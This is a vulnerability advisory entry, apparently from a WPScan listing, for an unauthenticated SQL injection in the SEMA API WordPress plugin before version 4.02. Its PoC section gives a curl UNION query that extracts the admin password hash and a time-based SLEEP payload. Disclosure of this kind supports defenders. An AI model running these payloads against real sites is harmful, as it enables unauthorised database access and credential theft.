Lucene search

K
wpvulndbCydaveWPVDB-ID:2A226AE8-7D9C-4F47-90AF-8A399A08F03F
HistoryApr 13, 2022 - 12:00 a.m.

SEMA API < 4.02 - Unauthenticated SQLi

2022-04-1300:00:00
cydave
wpscan.com
17
sema api
unauthenticated
sql injection
ajax action
exploitable
users
security vulnerability

EPSS

0.002

Percentile

57.6%

The plugin does not properly sanitise and escape some parameters before using them in SQL statements via an AJAX action, leading to SQL Injections exploitable by unauthenticated users

PoC

v < 3.64: curl http://example.com/wp-admin/admin-ajax.php --data ‘action=get_semadata&type;=attributes&catid;=-3 UNION ALL SELECT 1,2,3,(SELECT user_pass FROM wp_users WHERE ID = 1),5-- -’ v < 4.02 https://example.com/wp-admin/admin-ajax.php?action=get_semadata&amp;type;=deleteattribute&amp;catid;=1&amp;attrids;=1) AND %28SELECT 42 FROM %28SELECT%28SLEEP%285%29%29%29b

EPSS

0.002

Percentile

57.6%

Related for WPVDB-ID:2A226AE8-7D9C-4F47-90AF-8A399A08F03F